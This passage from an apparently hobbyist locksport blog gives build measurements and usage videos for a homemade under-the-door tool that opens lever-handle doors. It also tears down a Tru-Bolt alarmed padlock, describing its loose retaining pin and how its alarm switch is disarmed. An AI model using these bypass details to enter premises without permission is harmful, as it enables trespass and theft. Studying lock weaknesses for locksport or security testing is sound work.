<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4AUPNbJCXLk3_DUQTZSTYkqw1VOkQ6TmCEfUYzZEyemutEo9Ggm54YzN-7fvKjD66eupOLKgsumKBNVhdXgKxB1tDSrHuQ_yOhytm_T4NRuzwLO92lPnoEWhHrkn7isqXcXwIsaj_2e8/s1600/Full+Glory.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4AUPNbJCXLk3_DUQTZSTYkqw1VOkQ6TmCEfUYzZEyemutEo9Ggm54YzN-7fvKjD66eupOLKgsumKBNVhdXgKxB1tDSrHuQ_yOhytm_T4NRuzwLO92lPnoEWhHrkn7isqXcXwIsaj_2e8/s320/Full+Glory.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Under The Door Tool (MULE)</td></tr>
</tbody></table>
Here's some pictures with measurements:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0tFGRVJc7lIiViDhHpg8TV3wVrbfBYMdKqNKeFb4_kacTaEwa7ECJdj4O1XC8dvipBJAG4hdFgPNSQXUN2rz5X7Sl3R_lL1_pZlNbI0tUlCQR8h-jghzeeWfEsacT-2vWmWM2zcVi6zA/s1600/Full+Measure.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0tFGRVJc7lIiViDhHpg8TV3wVrbfBYMdKqNKeFb4_kacTaEwa7ECJdj4O1XC8dvipBJAG4hdFgPNSQXUN2rz5X7Sl3R_lL1_pZlNbI0tUlCQR8h-jghzeeWfEsacT-2vWmWM2zcVi6zA/s320/Full+Measure.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">From Top of the Lever Catch to the Bottom of the Curve 42"</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx6w67SkI9TnbTYyz127bCV8QJtASIlRO8bxmCDZkPFUUDY_jBWMwJJguMb3x0PInuGmTuD-rq8VN0Y-uUlF4f3IJ4OzEWkSffw0fcKYEShcOlX-T1x3uzkc-d74fgkFBvv64ANLorhJ4/s1600/Full+Measure+Proof.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx6w67SkI9TnbTYyz127bCV8QJtASIlRO8bxmCDZkPFUUDY_jBWMwJJguMb3x0PInuGmTuD-rq8VN0Y-uUlF4f3IJ4OzEWkSffw0fcKYEShcOlX-T1x3uzkc-d74fgkFBvv64ANLorhJ4/s320/Full+Measure+Proof.jpg" width="217" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Proof it's actually 42"</td></tr>
</tbody></table>
Note that the doors I tested these on have the handles at 41". That may not be the case for your locale, get a tape measure and go get some weird looks, find an average that works for you.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheqs2gzlqoWT2oEYBqQMVgQsCqjf0mphXbxFeFJLsruiPcuuR4VkidyXLEsapcNGu6HHwLD3tLpe7sUIQjlcC0tvivRwovd3_RPIbKJGytZLbbKE0g7rrsq5pZhrY5V2BbfhEzuinzDhw/s1600/Bottom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheqs2gzlqoWT2oEYBqQMVgQsCqjf0mphXbxFeFJLsruiPcuuR4VkidyXLEsapcNGu6HHwLD3tLpe7sUIQjlcC0tvivRwovd3_RPIbKJGytZLbbKE0g7rrsq5pZhrY5V2BbfhEzuinzDhw/s320/Bottom.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">From shaft to handle 14"</td></tr>
</tbody></table>
The hoop, I didn't have any accurate measurement on the angle I just kinda guessed knowing that I needed to keep the handle away from the door so I could operate it but also needed to make sure the angle wasn't too wide so that the top where the string attaches would actually come back into contact with the door. The about a paint can estimate from <a href="http://darksim905.com/lockpicking.php" target="_blank">darksim905 lockpicking</a> seems to be about right, I just shaped it by hand but it seems to have worked out.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCg9Ly2vJjDpScm-FIiXlLsdSK_fGVd75rHonwpmQRG2qZvsp8bESU3LBx3D9ABxC-TMRj9iZLnpu_dAIVxnTWU0WcB-xHbrZAkC2PS9EBnHgS6fsqwp-FpvvwP1Hh5IZdQbKxfjrIw0g/s1600/Handle.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCg9Ly2vJjDpScm-FIiXlLsdSK_fGVd75rHonwpmQRG2qZvsp8bESU3LBx3D9ABxC-TMRj9iZLnpu_dAIVxnTWU0WcB-xHbrZAkC2PS9EBnHgS6fsqwp-FpvvwP1Hh5IZdQbKxfjrIw0g/s1600/Handle.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">4.5" for the handle.</td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
I've found it's a lot more comfortable for me to actually hold the whole handle instead of trying to put my hand through it to hold it. Adjust for your hand size / comfort.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuzHQIBlTEgrXrMGy6Om10T6vXho0jl0Hwp9SH6WAVrtNUSOnJ3UlZUSw71FG_ZpIebFkD-1Lz9pdMV7DbGhC2SRI8x5FhyphenhyphenpOzK-DUzE6e1LvRDzMlvTADKWLB-b_tepm5lb9sqbpq4fQ/s1600/Top.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuzHQIBlTEgrXrMGy6Om10T6vXho0jl0Hwp9SH6WAVrtNUSOnJ3UlZUSw71FG_ZpIebFkD-1Lz9pdMV7DbGhC2SRI8x5FhyphenhyphenpOzK-DUzE6e1LvRDzMlvTADKWLB-b_tepm5lb9sqbpq4fQ/s320/Top.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Just over 6" for the top</td></tr>
</tbody></table>
I would like to note here that there is a design flaw. The loop where the rope attaches needs to have its lowest point nearest the door so the rope stays in place. Where the string is attached now should be the lowest point in the hoop, perhaps more of a triangle design, or something to hold it there. As it stands right now the rope has too much room to travel and, as you will see in the videos below, can cause it to miss the space between the door and the handle.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvS7vDbhZwX5Oqu_li4uQEHR9gqFX0zcJvNCFXZHbPBVfF90nUBLi8M468giJSUvzwqk1uBZaxKxF9lUuT69AH7yZcypRihcinMtYwUJcw_2T_Qod7QfiQrhvnmQu0BnvEuNLDRVlAEiE/s1600/Rope.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvS7vDbhZwX5Oqu_li4uQEHR9gqFX0zcJvNCFXZHbPBVfF90nUBLi8M468giJSUvzwqk1uBZaxKxF9lUuT69AH7yZcypRihcinMtYwUJcw_2T_Qod7QfiQrhvnmQu0BnvEuNLDRVlAEiE/s1600/Rope.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">End of the Rope 5'</td></tr>
</tbody></table>
The 5' rope is a completely arbitrary number, seems to be about right though. Maybe a little shorter would work just as well. I do need to find another material and this is already starting to show signs of wearing where it scrapes against the bottom of the door when pulling to activate the handle.<br />
<br />
<br />
Here are 3 videos of it in use. I've included the fail videos to dispel the theory that this is magic and everyone gets it on the first try. I hate videos that only show things working, you learn nothing from things working, you learn from things not working. It's not a complicated tool, but there are some caveats.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dzJgd7Sxn_pXer0EgSDDmTNIOv0Zg2TmludamTRrLr_XsISf3fMwCwQQsZQt9vbFN2Qel2TCdGYyBHjr-Ss7A' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
In this video you see what happens when your rope isn't at the point closest to the door, hence the need to redesign the loop where the rope connects into more of a triangle.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dwm7qZaNx2BlBvHINIkwSt8hQxIw7sEImCDbeY0Cc6c5BvwMbyAQj9GawI4ECbQFp6h6vrUAoivV4H1aW4G3g' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In this video you see what happens if you don't keep control of the rope. It gets wound around the tool and then you can't get it over the handle.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dymp-5neZbzwCJhw9sZ-ASF2pLUn4b2KZOZDDFpsFWtG4N7uNJ2D-cS3rmziKfz9mYkaHYyEcT-7zCEwFYz2g' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
And finally, victory. Like I said, not an overly complicated tool, but there are some things you need to keep in mind. The reason I had such a difficult time maneuvering the tool under the door is that this particular door has about half the space that the rest of the doors have between it and the floor.<br />
<br />
Tru-Bolt Alarmed Padlock (2012-08-30)<br />
<br />
So while I was out picking up some material for a project I happened to run across this padlock.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIkpJO2Xa_MFthXMsjQkdJkqkxX01bD4_HhINPBVU-zCsjbcSKwdPHkmX7M7YagiWHO03cYLwmI76YDc10MMaMAcZ5Vg1dMqPZH5zJcPd6PfTmRBaLEBdInBmk8fk7izDjPkuvRmU75OU/s1600/Lies3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIkpJO2Xa_MFthXMsjQkdJkqkxX01bD4_HhINPBVU-zCsjbcSKwdPHkmX7M7YagiWHO03cYLwmI76YDc10MMaMAcZ5Vg1dMqPZH5zJcPd6PfTmRBaLEBdInBmk8fk7izDjPkuvRmU75OU/s320/Lies3.jpg" width="320" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit53IL5NxkScX0IC7VhiIRzePYMjO1uk2b6B2CsPfVHLOGfpiaZpCjTQKffF2Kz3upWRx4cFOEjH4u_dL9g8g2fhU6rxgM8MeorbFCJD7wCQ7_CQyO_-0CFfayJnxNM89QaZGmU0aeiF8/s1600/Full.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit53IL5NxkScX0IC7VhiIRzePYMjO1uk2b6B2CsPfVHLOGfpiaZpCjTQKffF2Kz3upWRx4cFOEjH4u_dL9g8g2fhU6rxgM8MeorbFCJD7wCQ7_CQyO_-0CFfayJnxNM89QaZGmU0aeiF8/s320/Full.jpg" width="310" /></a></div>
<br />
I thought to myself, well, it has an unusual key, it has a tamper alarm, it's about $12... I need to play with this right now.<br />
<br />
After reading the write-up on its packaging I was very excited to begin attempting to defeat this lock.<br />
<br />
Here's what Tru-Bolt has to say about its product:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzAWVCUeiNdfWn8JxhFOsLtF4N-7IHLSRm7ya-8_2le8prcjxjY_eZcRMnarPBl9pJn3cj_6ZEtboj6MAITcgZ1VvepkfQCH6gLL0MW3H6jQbGtYAOOul3MWu5drKUmf8hGwXSORE2Q4/s1600/Lies1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzAWVCUeiNdfWn8JxhFOsLtF4N-7IHLSRm7ya-8_2le8prcjxjY_eZcRMnarPBl9pJn3cj_6ZEtboj6MAITcgZ1VvepkfQCH6gLL0MW3H6jQbGtYAOOul3MWu5drKUmf8hGwXSORE2Q4/s400/Lies1.jpg" width="248" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiNnA8CT25c7NjfDgcoL_QzjvNeHGHqmyAY68l0lawKwoPNyLtBcXpI2FA63fS-2u-qnyZYrdrYYpgC20sUpNEgeuJRJk_ZY2cf4XHiY5WSGopZwt9vbugndw66ZaPJwl7Y0y_SRGGE0s/s1600/Lies2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiNnA8CT25c7NjfDgcoL_QzjvNeHGHqmyAY68l0lawKwoPNyLtBcXpI2FA63fS-2u-qnyZYrdrYYpgC20sUpNEgeuJRJk_ZY2cf4XHiY5WSGopZwt9vbugndw66ZaPJwl7Y0y_SRGGE0s/s400/Lies2.jpg" width="246" /></a></div>
<br />
This is the keyway and key; not much room to get a pick in there:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdXhF56ysSUdR56afFS8bRC0-4vLwuLqMF3FKG-EBNsphPKDO3Da8J2rvUZJ0rEnnfT2vx7W3ebjyC5UCHTqlyDIVcrklMn-yJ_t-YINXuSoyPggHY92JGVUxw_K5uA9bO-vuALOyi2U0/s1600/Full-Side.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdXhF56ysSUdR56afFS8bRC0-4vLwuLqMF3FKG-EBNsphPKDO3Da8J2rvUZJ0rEnnfT2vx7W3ebjyC5UCHTqlyDIVcrklMn-yJ_t-YINXuSoyPggHY92JGVUxw_K5uA9bO-vuALOyi2U0/s320/Full-Side.jpg" width="147" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif1In2ayScZkcPGodObPJngCYd5usu3j2pr7nMN3jPqhK_gY3vgNsdvhgeDw93q_IuJNkhkAAOCrTqoL_-EOiFF_81fkUIBVxQ9dnQ_-9e5ErxgPMB3Vt-N-v1Xe-VlJ7ajYEjG3OLg6g/s1600/Key1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif1In2ayScZkcPGodObPJngCYd5usu3j2pr7nMN3jPqhK_gY3vgNsdvhgeDw93q_IuJNkhkAAOCrTqoL_-EOiFF_81fkUIBVxQ9dnQ_-9e5ErxgPMB3Vt-N-v1Xe-VlJ7ajYEjG3OLg6g/s320/Key1.jpg" width="320" /></a></div>
<br />
I thought that perhaps I had found a decent lock with a novel idea at a decent price.<br />
<br />
This is what happened when I opened it the second time:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNbc7MrwiEcfDuN6kZGP6JvyOmat1N0jPzAh1O-MT6d5rvL6FD7tJg65ZxNiEhMstmcwO-9oMHUtKsQYMjG_piBlWK4KQ2W7nNgZocTYGz5mB2KZxxPrGgxvHlJimHQ4HNw_MpF5ZbOuk/s1600/FAIL1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNbc7MrwiEcfDuN6kZGP6JvyOmat1N0jPzAh1O-MT6d5rvL6FD7tJg65ZxNiEhMstmcwO-9oMHUtKsQYMjG_piBlWK4KQ2W7nNgZocTYGz5mB2KZxxPrGgxvHlJimHQ4HNw_MpF5ZbOuk/s320/FAIL1.jpg" width="320" /></a></div>
I turned the key and then the whole lock plug came out.<br />
<br />
This here is the only thing that holds the lock in place:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RZlI-f7hRO-l3GBPB1UGZHcBVCV_Y0oDgUZlHrFDR4GdzygG9dbhSI48ID1FbLuEHVcnaEpwcNrOiOR0bTgWzWyhl6H7bruEmwl1WsndVgi5qmE4awatGrXgIJJ6CQC366KG0QoifPQ/s1600/THE_Pin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RZlI-f7hRO-l3GBPB1UGZHcBVCV_Y0oDgUZlHrFDR4GdzygG9dbhSI48ID1FbLuEHVcnaEpwcNrOiOR0bTgWzWyhl6H7bruEmwl1WsndVgi5qmE4awatGrXgIJJ6CQC366KG0QoifPQ/s320/THE_Pin.jpg" width="320" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnzspAhvK5G-3gYPvpsyitUgTywMCMqTLrd-6vPInkR5MwJjbt_Jo-ntyk3peiZQUk8n7amIHDapKWp93ZxVaUq9vn3RV7sevkIHJtjC-RN5WgZPASZ3tzAwXcb8gEVa7atlMr2tyoS8/s1600/THE_Pin2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnzspAhvK5G-3gYPvpsyitUgTywMCMqTLrd-6vPInkR5MwJjbt_Jo-ntyk3peiZQUk8n7amIHDapKWp93ZxVaUq9vn3RV7sevkIHJtjC-RN5WgZPASZ3tzAwXcb8gEVa7atlMr2tyoS8/s1600/THE_Pin2.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The ENTIRE security of this lock is defeated by this poor design</td></tr>
</tbody></table>
It's not tapped and threaded to lock it in place, it's not even glued in place, nothing, just rammed in there. Here's the corresponding spot on the lock where it gets inserted:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVprBAEfXN4McP_Ka527kpoFt_TDMXAsX2A4uggWG17wkpfvnoyJRVSdjTQXNJC6posr80HNQ-rGgvyElcWOrFp5uxjX6Qu-OAPyE7ksnJXMUUUrqwGB_tmVhaIcW83wHrsuGH0xEuzU/s1600/Plug.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVprBAEfXN4McP_Ka527kpoFt_TDMXAsX2A4uggWG17wkpfvnoyJRVSdjTQXNJC6posr80HNQ-rGgvyElcWOrFp5uxjX6Qu-OAPyE7ksnJXMUUUrqwGB_tmVhaIcW83wHrsuGH0xEuzU/s320/Plug.jpg" width="320" /></a></div>
That's not a particularly deep drilling point, it doesn't mushroom out at the top, and it's actually tapered to a point at the lowest spot. There's NOTHING to actually keep that pin in its place. Since that's the ONLY thing holding the lock plug in place, that causes a bit of a problem.<br />
<br />
I was pretty disappointed at that moment, this intriguing challenge ruined because some knucklehead didn't think about securing that pin.<br />
<br />
Spirit bent but not broken, I carried on with the dissection of the lock.<br />
<br />
There is still the actual lock and the alarm.<br />
<br />
Since the lock itself is essentially useless, I put that on a back burner for later and went about finding out how this tamper-resistant portion worked.<br />
<br />
Let me start by saying that 110 dB (if that's actually how loud it is) is pretty damn loud. Ear-splitting "OMG the earth is ending" loud. Needless to say, the novelty of it going off did not extend to my family while I was playing with it. It was suggested that I make it stop doing that if I were to continue to occupy the house.<br />
<br />
Here's the internals of the alarm.<br />
<br />
It's really really loud.<br />
Seriously.<br />
<br />
Here's the bottom housing of the lock. It only holds the speaker; the contacts there connect to the battery pack and electronics that are housed in the lock body. It's attached by 2 screws that are accessible when you remove the shackle.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOSlZFqECjs2oukfc2THqcXp_QrlLMqEILYUFOGlzulP7bWMTrehh_mWGa8PKLl9NHfXuo7eh9uF7QUe7I0TEalvtrzAXJ8_2PevFvhTdpxkcGMN5z09GuFEM-Li1LFNvyBhMdbMIw9NQ/s1600/Speaker.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOSlZFqECjs2oukfc2THqcXp_QrlLMqEILYUFOGlzulP7bWMTrehh_mWGa8PKLl9NHfXuo7eh9uF7QUe7I0TEalvtrzAXJ8_2PevFvhTdpxkcGMN5z09GuFEM-Li1LFNvyBhMdbMIw9NQ/s320/Speaker.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Inside</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTNbNGqFVOf2N3Sl196JezA_0-UN1SsNoHJK2au2sBZ2Pv4WYSB1Zx6lGrlTdq86R3Yhdpz40jRByXg9bM1T6XJHVWajjupLSTh9uT8WEWa4td2Mnwvn4YEcCyoCwMg3PnargXXWvoUOA/s1600/Speaker_Bottom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTNbNGqFVOf2N3Sl196JezA_0-UN1SsNoHJK2au2sBZ2Pv4WYSB1Zx6lGrlTdq86R3Yhdpz40jRByXg9bM1T6XJHVWajjupLSTh9uT8WEWa4td2Mnwvn4YEcCyoCwMg3PnargXXWvoUOA/s320/Speaker_Bottom.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Outside, also the bottom of the lock.</td></tr>
</tbody></table>
<br />
Here's the actual electronics:<br />
<br />
This is the battery pack, housing for the circuit board, and contacts that connect to the speaker. It's held in place by a large O-ring that is pressed into a groove around the battery pack device and the lock body. This also helps weatherproof it.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5EGO8nrUJlA2QyHbDQ7USXvt9fR7KFrXrNtidqJ-z4OcKVqpf9KbbzXvof86gqkjtgTeQ2ZaZTkhZ_Z0I1gpLvmLDyJU9LSETI0_aShannzCAAtG5VIj7Wsd0A0BgkwD-8rLGlBfKrU/s1600/Battery_Pack.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5EGO8nrUJlA2QyHbDQ7USXvt9fR7KFrXrNtidqJ-z4OcKVqpf9KbbzXvof86gqkjtgTeQ2ZaZTkhZ_Z0I1gpLvmLDyJU9LSETI0_aShannzCAAtG5VIj7Wsd0A0BgkwD-8rLGlBfKrU/s320/Battery_Pack.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Battery Pack</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpX1J2aocdqZhKKf_2s-SIC58r9rMqngmW8oR7MKiDJPHI3M0myVPw4qo9kRxC5iIIrekl0BhuHhoxLFPt6sAlh21Lo_eni-C990uw6zWJS_x5zLZdb4OOF_GMsscFk4lkjw5HDMFwZhU/s1600/Electronics.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpX1J2aocdqZhKKf_2s-SIC58r9rMqngmW8oR7MKiDJPHI3M0myVPw4qo9kRxC5iIIrekl0BhuHhoxLFPt6sAlh21Lo_eni-C990uw6zWJS_x5zLZdb4OOF_GMsscFk4lkjw5HDMFwZhU/s320/Electronics.jpg" width="244" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Other side of the battery pack</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY1l3bLUwoigxh7HWofk8L-Qg1hPFQfMWOqg-fH3hpQugkS_iMi1TTiElS-DhU6psSDrqX65Ol6CCiEeB_vqUbAa9QWnx-yrVJzEPqWGY-JoQzfoVpEyXgy9-SwngxaqggxE_B4dA0VYQ/s1600/Electronics2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY1l3bLUwoigxh7HWofk8L-Qg1hPFQfMWOqg-fH3hpQugkS_iMi1TTiElS-DhU6psSDrqX65Ol6CCiEeB_vqUbAa9QWnx-yrVJzEPqWGY-JoQzfoVpEyXgy9-SwngxaqggxE_B4dA0VYQ/s320/Electronics2.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bottom of the circuit board on top of the battery pack</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF_WkS1aV8VDoNIDR8GPb4BRYkLyRPsv376Cc4ZxTeUeRKMX44cszdcgglf-Qnxx-92R2h2ttnSoTzW7OnKHcy8z9JUOl5FHC-y-qct4yUsOyk7gehSGtLs0N6XU6uLPg4bb93X29iRDY/s1600/Electronics3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF_WkS1aV8VDoNIDR8GPb4BRYkLyRPsv376Cc4ZxTeUeRKMX44cszdcgglf-Qnxx-92R2h2ttnSoTzW7OnKHcy8z9JUOl5FHC-y-qct4yUsOyk7gehSGtLs0N6XU6uLPg4bb93X29iRDY/s320/Electronics3.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Another angle </td></tr>
</tbody></table>
Here is the ball for the switch that either enables or disables the alarm. It's a simple contact switch housed in a rubber / silicone housing inside the lock, above the battery pack.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy_X6xEfHHAoTOXkYxKTbPb8BksSjTcX6_S4XDXKFqczNLpShxNnHmASYkVzRjOGbBp3XFkh436GRNGiD7S-q9nJRCjED1slV1HL2LauXEqKn_EkNuNv9cRxG6dLohO4cCO8bdT5rnNw/s1600/Alarm_Arming_Button.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy_X6xEfHHAoTOXkYxKTbPb8BksSjTcX6_S4XDXKFqczNLpShxNnHmASYkVzRjOGbBp3XFkh436GRNGiD7S-q9nJRCjED1slV1HL2LauXEqKn_EkNuNv9cRxG6dLohO4cCO8bdT5rnNw/s320/Alarm_Arming_Button.jpg" width="320" /></a></div>
<br />
As you can see here, the shackle has a recessed area on one side. If you insert it with the recessed area in the hole with the switch, the alarm is not active: the contact is not pressed and the circuit is open. If you insert the side that does not have the recess cut, the ball is pressed into the contact, the circuit is closed, and the alarm is then active.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
